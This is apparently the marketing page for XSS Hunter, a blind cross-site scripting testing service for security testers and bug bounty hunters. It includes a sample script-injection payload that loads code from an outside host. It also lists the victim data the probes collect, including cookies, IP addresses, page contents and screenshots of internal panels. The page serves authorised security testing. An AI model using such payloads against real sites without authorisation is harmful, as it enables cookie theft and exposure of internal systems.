What is XSS Hunter?
XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
Upon signing up you will create a special
xss.ht short domain such as
yoursubdomain.xss.ht which identifies your XSS vulnerabilities and hosts your payload. You then use this subdomain in your XSS testing, using injection attempts such as
"><script src=//yoursubdomain.xss.ht></script>. XSS Hunter will automatically serve up XSS probes and collect the resulting information when they fire.
Managed XSS Payload Fires
Easily manage all of your XSS payload fires in one spot! All vulnerabilities are recorded in your XSS Hunter control panel. Even the often-missed blind XSS payload fires which occur in other victim's browsers in place such as backend administrative panels, logging systems, and more are all recorded.
Powerful XSS Payload Probes
All XSS Hunter payloads work as probes to gather information on where they have fired. The following information is collected upon a payload firing:
The vulnerable page's URI
Origin of Execution
The Victim's IP Address
The Page Referer
The Victim's User Agent
All Non-HTTP-Only Cookies
The Page's Full HTML DOM
Full Screenshot of the Affected Page
Responsible HTTP Request (If an XSS Hunter compatible tool is used)
Full Page Screenshots
XSS Hunter probes utilize the HTML5 canvas API to generate a full screenshot of the vulnerable page which an XSS payload has fired on. With this feature you can peak into internal administrative panels, support desks, logging systems, and other internal web apps. This allows for more powerful reports that show the full impact of the vulnerability to your client or bug bounty program.
Markup Report Generation
Speaking of powerful reporting, did we mention that each XSS payload report comes with a pre-generated markdown submission for HackerOne? Collecting your bounty has never been easier. These generated reports are also compatible with other markdown-supporting platforms such as Phabricator for easy bug reporting on company ticketing systems.
XSS Payload Fire Email Reports
XSS payload fires also send out detailed email reports which can be easily forwarded to the appropriate security contacts for easy reporting of critical bugs.
Custom XSS Shortdomain
Upon registering for XSS Hunter you will get your own short domain for your XSS payloads which can be used on length-restricted input fields. No need to setup DNS or hosting!
Automatic Payload Generation
XSS Hunter automatically generates XSS payloads for you to use in your web application security testing.
Perhaps the most powerful feature of XSS Hunter is the ability to correlate injection attempts with XSS payload fires. By using an XSS Hunter compatible testing tool you can know immediately what caused a specific payload to fire (even weeks after the injection attempt was made!).